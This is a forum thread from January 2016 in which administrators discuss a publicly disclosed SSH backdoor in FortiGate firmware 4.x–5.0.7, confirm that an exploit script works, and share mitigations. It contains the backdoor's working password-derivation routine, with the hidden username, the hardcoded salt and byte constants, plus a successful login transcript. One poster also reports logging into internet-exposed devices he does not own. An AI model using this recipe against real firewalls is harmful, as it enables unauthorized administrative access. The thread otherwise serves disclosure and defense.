SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

Page: 12 > Showing page 1 of 2
Author
MikeU
New Member
  • Total Posts : 14
  • Scores: 0
  • Reward points: 0
  • Joined: 2007/09/26 10:59:14
  • Status: offline
2016/01/12 10:22:38 (permalink)
0

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
http://seclists.org/fulldisclosure/2016/Jan/26
 
I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.
 

=Mike

#1
deepakmime
New Member
  • Total Posts : 1
  • Scores: 0
  • Reward points: 0
  • Joined: 2015/12/08 10:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 11:55:58 (permalink)
0
is there any comments from Fortinet Technical team on it. very keen to know
 
the guy here in twitters confirms that he has the backdoor working
 
https://twitter.com/esizkur
 
 
 
#2
djwilliams
New Member
  • Total Posts : 14
  • Scores: 0
  • Reward points: 0
  • Joined: 2014/01/16 07:40:44
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 12:38:48 (permalink)
0
I have tried the script out there and have not been able to get it to work.  Until we get some answer from Fortinet I'm going to keep at it.
#3
Stan
New Member
  • Total Posts : 1
  • Scores: 0
  • Reward points: 0
  • Joined: 2014/12/22 05:43:08
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 13:05:19 (permalink)
0
Tried it on a 5.0.7 version and it works.
The script logs in without any password prompt
#4
kaj73
New Member
  • Total Posts : 17
  • Scores: 0
  • Reward points: 0
  • Joined: 2004/12/29 03:10:25
  • Status: offline
neonbit
Expert Member
  • Total Posts : 559
  • Scores: 72
  • Reward points: 0
  • Joined: 2013/07/02 21:39:52
  • Location: Dark side of the moon
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 16:52:43 (permalink)
0
Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...
 
~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200
FortiGate-VM64 # get sys status
Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FGVMEV0000000000
#6
neonbit
Expert Member
  • Total Posts : 559
  • Scores: 72
  • Reward points: 0
  • Joined: 2013/07/02 21:39:52
  • Location: Dark side of the moon
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/12 20:02:29 (permalink)
0
I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...
 
I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).

#7
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 01:26:21 (permalink)
0
Thanks for sharing Mike.
 
I've got mixed result. This one works:
Version: FortiGate-VM64 v5.0,build0128,121101 (GA)
 
But I was unable to access my FG-111C:
Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)
 
Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.
 
For those who don't want to dig too deep into this.
 
This is all the magic:
 
If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.
Then you can calculate the dynamic password based on this dword challenge:
 
n = $SSH_Challenge
m = $SHA1_Generator
 
m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
m.add('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())
 

 
Putty:
login as: Fortimanager_Access
 
Using keyboard-interactive authentication. -840056459
 
Access denied
 
Using keyboard-interactive authentication. -1914958026
 
Access denied
 
Using keyboard-interactive authentication. -1378285763
 
AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=
 
FortiGate-VM64 #
 

 
This only works, if you have a SSH access. So by limiting the ip ranges for all admin users, you can mitigate the threat.
post edited by localhost - 2016/01/13 02:39:06
#8
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 01:33:15 (permalink)
0
If you enable a ssh key it seems like it results in a fix . Can anybody confirm this on there FGT? ( upload a ssh key  from the CLI and retest )
 

PCNSE 
NSE 
StrongSwan  
#9
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:07:00 (permalink)
0
Like this?
 
login as: admin Authenticating with public key "rsa-key-20160113"
FortiGate-VM64 # conf sys admin
FortiGate-VM64 (admin) # show
config system admin
  edit "admin"
     set accprofile "super_admin"
     set vdom "root"
     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps                                                                                                           9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"
     config dashboard-tabs
        <snip>
     end
     config dashboard
        <snip>
     end
     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=
  next
end
FortiGate-VM64 (admin) #

 
Still able to access with the FortiManager user.
#10
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:27:40 (permalink)
0
No set a generic public key for a user "'Fortimanager_Access" and see what happens.

PCNSE 
NSE 
StrongSwan  
#11
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:33:28 (permalink)
0
You can't edit Fortimanager_Access.
 
FortiGate-VM64 (admin) # edit Fortimanager_Access
table name 'Fortimanager_Access' can't be added or edited because of duplication or reservation
Command fail. Return code -515

#12
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:44:12 (permalink)
0
I see thanks for validating. It looks like you can edit  the acct in 5.2.x, which I realize is not  impacted.
 
e.g
 
config system admin
    edit "Fortimanager_Access"
        set accprofile "prof_admin"
        set vdom "root"
        set password ENC AK1wkED9vYrMpQdDCa3VH7ciPxpid81Y0m8lUB4/qIzc+I=
    next
end


What OSversion are you running on that VM?
 

PCNSE 
NSE 
StrongSwan  
#13
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 02:55:10 (permalink)
0
I'm running: FortiGate-VM64 v5.0,build0128,121101 (GA)
 
I wonder what they've changed. I hope it's not just the salt or the method how they calculate the password.
Otherwise it's just a matter of time untill someone reverses the new method.
 
If you manually add the Fortimanager_Access user, do you still receive the challenges? And if you don't receive the challenges.. would the box still be manageable by the fortimanager?
#14
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/13 03:04:17 (permalink)
0
Yes and I can't answer the latter, no fortimanager here. Okay back to sleep for me it's 05:03AM ;)
 
 

PCNSE 
NSE 
StrongSwan  
#15
tab
New Member
  • Total Posts : 2
  • Scores: 0
  • Reward points: 0
  • Joined: 2016/01/21 12:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/21 13:18:16 (permalink)
0
Hi Folks,
 
Is disabling SSH admin access a viable (temporary) fix as suggested here?
 
We have 2 FWs that are on a vulnerable version and they will be replaced in 2 weeks. I'd just rather not go through the trouble of notifying customers and an extra downtime window if they're going to be decommissioned shortly.
 
TIA :)
#16
localhost
Gold Member
  • Total Posts : 135
  • Scores: 25
  • Reward points: 0
  • Joined: 2015/05/21 02:47:51
  • Location: Zug, Switzerland
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/22 01:14:02 (permalink)
0
tab
Is disabling SSH admin access a viable (temporary) fix as suggested here?



Yes sir. Easiest and fastest workaround.
#17
emnoc
Expert Member
  • Total Posts : 5800
  • Scores: 383
  • Reward points: 0
  • Joined: 2008/03/20 13:30:33
  • Location: AUSTIN TX AREA
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/22 04:46:40 (permalink)
0
And if you must need to open ssh to the public ( untrust ) than use a SSL access with ssl.root enable interface enabled for ssh. This will require ssl vpnclient, access ( local user or remote ) and then the sys admin login. So you have 2 jump thru 2 hoops to gain access.
 
http://socpuppet.blogspot.com/2015/03/sslvpn-sslroot-management-access.html
 
Ken

PCNSE 
NSE 
StrongSwan  
#18
tab
New Member
  • Total Posts : 2
  • Scores: 0
  • Reward points: 0
  • Joined: 2016/01/21 12:44:29
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/25 10:15:27 (permalink)
0
Great, thanks localhost and emnoc. I was a worried by the initial info that seemed to suggest that it was independent of having SSH enable. 
#19
slavko
Silver Member
  • Total Posts : 83
  • Scores: 6
  • Reward points: 0
  • Joined: 2014/08/09 01:05:35
  • Location: Montenegro
  • Status: offline
Re: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 2016/01/25 11:05:14 (permalink)
0
What is fascinating to me, and I must say this even though it is somewhat unprofessional, is how little attention this "issue" is getting here and on the Fuse. On that same note, I do not consider this to be an "issue". It is much worse than that. The fact that a "leading provider of fast and secure cyber security solutions" would let this kind of design/implementation flaw go into production worldwide is almost unbelievable. I hold the entire company responsible for this, and here's why: Product manager(s), for adopting this kind of "solution" to a relatively simple authentication problem. Product developers for implementing this "solution". Internal product security teams for not immediately (or ever, apparently - because if they did, the code wouldn't make it to FAZ 5.2) spotting and banning this obvious high-level security risk. Personally, I would much rather prefer this to have been a maliciously planted backdoor, than a design/implementation flaw. Because, after this, one has every right to ask: "Do these people even know what they are doing, can I trust them to protect my network?". At least in the Juniper case someone intentionally planted the malicious code, which implies they knew what they were doing. Here, it was unintentional. You cannot imagine how embarrassing the conversations with the customers were these days. Or can you?
post edited by slavko - 2016/01/25 11:11:26

NSE 4, NSE 5, NSE 7, FortiMail & FortiWeb Specialist
All oppinions/statements written here are my own.
#20
Page: 12 > Showing page 1 of 2
Jump to:
© 2020 APG vNext Commercial Version 5.5